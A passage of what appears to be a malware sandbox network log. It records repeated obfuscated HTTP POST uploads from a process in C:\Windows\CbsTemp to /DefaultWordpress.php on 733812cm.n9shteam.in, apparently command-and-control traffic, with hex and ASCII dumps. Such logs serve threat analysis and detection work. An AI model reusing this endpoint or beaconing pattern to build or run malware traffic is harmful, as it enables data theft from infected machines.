                                                          Server: cloudflare
                                                          CF-RAY: 8d5a538b2e4a26b0-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11308&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=121977&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          46192.168.2.550024188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:53.754448891 CEST286OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:54.104036093 CEST540OUTData Raw: 5e 5f 59 59 5a 5b 51 55 54 5b 52 57 50 5f 57 52 50 5b 5d 58 50 57 57 5f 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^_YYZ[QUT[RWP_WRP[]XPWW_\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ >>$+.?#Z01S?8Z*\'<21<%;.Z$><*#F $P.0
                                                          Oct 20, 2024 18:18:54.524266958 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:55.038105011 CEST788INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6wKyckXbeNNjMHA5PICqXEJGndFHqg001vlmbhL1o2r20HmaZSl1E20R%2FoF%2Fg1UPhXYAslJ02vj%2BCRwduoHIh7NNqza%2Fbc3ml1Jqtq1Xb0yNnvdVJ7xCPasBDQ6UeaxFoPtxdFZUSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53923ea0faf8-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12968&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=826&delivery_rate=110745&cwnd=48&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:55.116760015 CEST788INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6wKyckXbeNNjMHA5PICqXEJGndFHqg001vlmbhL1o2r20HmaZSl1E20R%2FoF%2Fg1UPhXYAslJ02vj%2BCRwduoHIh7NNqza%2Fbc3ml1Jqtq1Xb0yNnvdVJ7xCPasBDQ6UeaxFoPtxdFZUSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53923ea0faf8-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12968&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=826&delivery_rate=110745&cwnd=48&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          47192.168.2.550025188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:53.854254961 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:54.214533091 CEST2528OUTData Raw: 5e 58 5c 5d 5a 5f 54 55 54 5b 52 57 50 5d 57 5d 50 5e 5d 56 50 50 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^X\]Z_TUT[RWP]W]P^]VPPWT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#>>$(:+3($1<<=/'><&1Y'(&'X:<:#F $P.
                                                          Oct 20, 2024 18:18:54.675707102 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:55.038125992 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:55.046444893 CEST793INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2Bg2YtJ%2BqYmvUnaY7tF3hGqn5p6rJ3%2BbYzw3hoYOgE1N2jjlWyOK8SeFDW1Z6ns%2B%2F17EWO6cK58Wa6zmf7Vtt6Og2kkJVyRXMjnStcs0S76%2BKRbXfK6kjRKyIGUZrSd87iuM1YxwIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53933b4a255c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11240&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=130227&cwnd=36&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          48192.168.2.550027188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:53.886749983 CEST310OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:54.245465994 CEST540OUTData Raw: 5e 5d 59 5b 5f 58 51 55 54 5b 52 57 50 5e 57 55 50 5a 5d 57 50 52 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]Y[_XQUT[RWP^WUPZ]WPRWT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#=-X%]!T?&(&?4])+'=$$!7'8:3>*\(#F $P.4
                                                          Oct 20, 2024 18:18:54.675694942 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:55.038136005 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:55.038172960 CEST796INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4HggySRqWzY4LZ%2B6XxWGb4Ygqq1DPkqTszEJgObb2SmM1miRuXMHvuLxB%2BT%2Fw5R%2Bf%2BNade2lx2Jil6B%2Fm3FU%2F1k6QaVOQkwbXaAA8tr2eDVf8LHiuoCr1CZr6LQaWgI4jc%2B8DEhAoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53933b152710-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11309&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=850&delivery_rate=128585&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:55.038620949 CEST322OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----Pv8pm7zxVL6QdYKSFHyggQKKz8qKsZUW2Z
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 3014
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:55.208601952 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:55.208749056 CEST3014OUTData Raw: 2d 2d 2d 2d 2d 2d 50 76 38 70 6d 37 7a 78 56 4c 36 51 64 59 4b 53 46 48 79 67 67 51 4b 4b 7a 38 71 4b 73 5a 55 57 32 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------Pv8pm7zxVL6QdYKSFHyggQKKz8qKsZUW2ZContent-Disposition: form-data; name="0"Content-Type: text/plain^\YYZ[TRT[RWPXWUPQ]XPUWX\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:55.601439953 CEST793INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zM2hXn7tumyy8r50Z9X%2BQbFDyY2G7CoVlnbCOLaZXm6r0a5wT772r%2BnkvEFml%2BTV3fdDrF%2BWpOgUwVHaX0D3jgDRHXfM7DH7sMACjYNqW3NgU3dmasIzlJaXmeWNW%2BuQzUnPpZqkmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53968eca2710-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11309&sent=6&recv=11&lost=0&retrans=0&sent_bytes=846&recv_bytes=4186&delivery_rate=254035&cwnd=34&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:55.602957964 CEST322OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----tvPFcKajitlNWzczXkNzA6CXVW19pPAyee
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2982
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:55.776715994 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:55.776868105 CEST2982OUTData Raw: 2d 2d 2d 2d 2d 2d 74 76 50 46 63 4b 61 6a 69 74 6c 4e 57 7a 63 7a 58 6b 4e 7a 41 36 43 58 56 57 31 39 70 50 41 79 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------tvPFcKajitlNWzczXkNzA6CXVW19pPAyeeContent-Disposition: form-data; name="0"Content-Type: text/plain[]\Y_XQVT[RWP_WSP]]_PSWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:56.165977955 CEST797INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iS7WUgxHKRddz1WIrt%2BGjvUW7bs5l5%2F8HjF%2Bes7cQO9vwXoRB0YQokqpdMzZPhU%2B63H1%2BGVULtBEGzOlyitX8gQohzpOvo%2BqzAlcfGnEbL3a47KA1IOgWdOTxF2co8jp294mCW4Nag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a539a1b662710-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11271&sent=10&recv=18&lost=0&retrans=0&sent_bytes=1664&recv_bytes=7490&delivery_rate=257011&cwnd=37&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:56.166871071 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1924
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:56.343043089 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:56.343218088 CEST1924OUTData Raw: 5b 58 59 5f 5a 5f 51 5c 54 5b 52 57 50 59 57 57 50 5d 5d 5a 50 53 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [XY_Z_Q\T[RWPYWWP]]ZPSW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#)Z$+<#$89R?-?=< '-+Y124$820>.X?#F $P.(
                                                          Oct 20, 2024 18:18:56.728576899 CEST940INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dQnz3fxQKMpUIY4ZuD6DnHobVd8wtmYpsn1nd0Ii%2B60yqWZAQlN9kbAH8SeFlOSWsYo8wbubr1yBVy4mOP0Br79Jxr3vw6FDvxiiivX0Cw40WEDQe4YOqJBM1xu%2FQPnhFevN%2BKdhcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a539d9f732710-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11288&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2486&recv_bytes=9701&delivery_rate=257011&cwnd=38&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 25 06 27 11 28 0c 3d 3c 30 1d 3a 3e 2d 57 2e 2d 23 5c 39 31 07 5d 27 23 07 06 31 04 0b 58 26 55 3c 07 36 3c 2d 01 20 59 3d 57 2d 36 28 5e 07 12 26 10 3c 3f 3c 15 2a 3d 3c 5d 3c 01 30 5c 35 0e 33 06 27 2e 2c 0b 25 2d 2a 00 2a 31 31 59 28 2d 22 50 39 1d 39 08 2d 01 3c 5d 20 10 22 53 03 13 25 5c 29 33 28 5b 22 22 15 59 2b 3d 20 02 28 06 21 05 3d 1d 2f 59 28 38 3b 1d 2c 3e 26 5c 25 3c 38 59 32 11 0a 5c 26 29 30 0a 33 00 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98%'(=<0:>-W.-#\91]'#1X&U<6<- Y=W-6(^&<?<*=<]<0\53'.,%-**11Y(-"P99-<] "S%\)3([""Y+= (!=/Y(8;,>&\%<8Y2\&)03$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          49192.168.2.550028188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:55.172306061 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:55.525763035 CEST2528OUTData Raw: 5b 5c 5c 58 5a 5a 51 56 54 5b 52 57 50 5c 57 53 50 5c 5d 5a 50 56 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [\\XZZQVT[RWP\WSP\]ZPVW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#( %_%]9<U?]3(!V(=?><<Y0'X$!32\0!+#F $P.<
                                                          Oct 20, 2024 18:18:55.975980043 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:56.198065042 CEST788INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NpT1axHLejSageQ5RER9euAulf199X7cWO0t8lVpUjtkUbxOzlPjPkzXGxmyPPjbnlwqZk5L2gKddNpDel7%2FSmo9gGNETRgz2XgN%2BuZo%2FPM5pBR6SW9lYzI0ONAPQNLs96L2aEODXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a539b59d396e1-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12896&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=111659&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          50192.168.2.550029188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:56.337438107 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:56.681994915 CEST2528OUTData Raw: 5e 5c 5c 5f 5a 53 51 56 54 5b 52 57 50 5e 57 55 50 59 5d 5f 50 56 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^\\_ZSQVT[RWP^WUPY]_PVW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _>>1)S<3,$-++*8\$=?_&7_'%3!?#F $P.4
                                                          Oct 20, 2024 18:18:57.127840042 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:57.340681076 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:57.365863085 CEST799INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:57 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BhP08VouHohVzv3C5CaRjp%2BrQXcCmEzn6WBRFf%2BkE0fUviTiISLxxt5UikzFXmL7cM%2F4j%2BMkYE2GMbyqf%2FGgnWRssn%2BpVMg96uYkp%2FZACSXaNuKnJUBA%2FNv595EsQhGSes0hsSRTOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53a28f3f96e4-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12890&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112605&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          51192.168.2.550030188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:57.584322929 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:57.931993961 CEST2528OUTData Raw: 5e 58 5c 5e 5a 52 51 51 54 5b 52 57 50 52 57 5d 50 50 5d 5a 50 54 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^X\^ZRQQT[RWPRW]PP]ZPTWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ )#=$8"?0'Z3+1R?=(= [$<2W?'8=0&(:#F $P.
                                                          Oct 20, 2024 18:18:58.350317955 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:58.734368086 CEST785INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oOQ2qeae0jtKyf9rtXQchJ0xfY4pSTWf%2FtIPZsqZjatJUcFl2k8t1DukFdeJ5VlBstD9aezurkqFip7t4UzZfrOfxURnw00hi5irR3PFH11RVp0l2Yo0LfwcVZWSYJW7v5W%2BO0hixA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53aa2a17172a-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11322&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=129101&cwnd=59&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          52192.168.2.550031188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:58.862334013 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
